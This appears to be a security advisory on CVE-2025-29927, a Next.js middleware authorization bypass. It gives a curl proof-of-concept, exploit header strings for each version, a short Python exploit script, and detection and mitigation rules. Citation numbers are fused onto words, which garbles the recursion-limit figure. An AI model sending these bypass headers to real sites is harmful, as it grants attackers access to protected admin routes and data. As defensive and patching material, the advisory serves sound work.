A severe security flaw in Next.js, tracked as CVE-2025-29927, allows attackers to bypass authentication and authorization checks by manipulating HTTP headers. The vulnerability affects Next.js versions 11.1.4 through 15.2.2 and has been assigned a CVSS score of 9.1, indicating critical severity16.
Key Takeaways for Security Teams
- Vulnerability: Attackers can bypass Next.js middleware security by injecting a malicious
x-middleware-subrequestheader. - Impact: Unauthorized access to protected routes, admin panels, and sensitive data.
- Affected Versions: Next.js 11.1.4 to 15.2.2.
- Fix: Upgrade to Next.js 15.2.3+ or 14.2.25+.
- Workaround: Block the
x-middleware-subrequestheader at the web server level.
Technical Details
The vulnerability stems from Next.js’s middleware recursion limit mechanism. Middleware functions typically handle authentication, geo-blocking, and security headers. However, the framework skips these checks if the x-middleware-subrequest header exceeds a default recursion depth of 53.
Proof of Concept (PoC)
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
http://vulnerable-site.com/adminThis request bypasses middleware entirely, granting access to restricted endpoints38.
Exploit Variations by Next.js Version
| Project Structure | Exploit Header Format |
|---|---|
| Pages Router (v11.1.4-12.1.x) | x-middleware-subrequest: pages/_middleware |
| App Router (v12.2.x-13.x) | x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware |
App Router with /src (v14.x-15.2.2) |
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware |
Attack Scenarios
- Authentication Bypass: Access admin dashboards without credentials2.
- CSP Bypass: Disable security headers, enabling XSS attacks3.
- Geo-Blocking Evasion: Bypass regional restrictions9.
Detection and Mitigation
For Defenders
- Detection: Monitor for abnormal
x-middleware-subrequestheaders in logs. Example Splunk query:index=web_logs "x-middleware-subrequest=*middleware*" | stats count by src_ip - Mitigation:
- NGINX:
location / { proxy_set_header x-middleware-subrequest ""; } - Apache:
RequestHeader unset x-middleware-subrequest
- NGINX:
For Security Researchers
A Python script demonstrating the exploit (for testing purposes only):
import requests
target_url = "http://target.com/admin"
headers = {"x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"}
response = requests.get(target_url, headers=headers)
print(response.text)Conclusion
CVE-2025-29927 highlights the risks of relying solely on middleware for security. Immediate patching or header blocking is essential. Organizations using Next.js should also implement server-side authentication checks (e.g., NextAuth.js) as a defense-in-depth measure36.
References
- Critical flaw in Next.js lets hackers bypass authorization. BleepingComputer.
- Critical Next.js Vulnerability Allows Attackers to Bypass Middleware. The Hacker News.
- CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability. Strobes.
- Authorization Bypass in Next.js Middleware · CVE-2025-29927. GitHub Advisory Database.
- Next.js Middleware Vulnerability (CVE-2025-29927). SOCRadar.
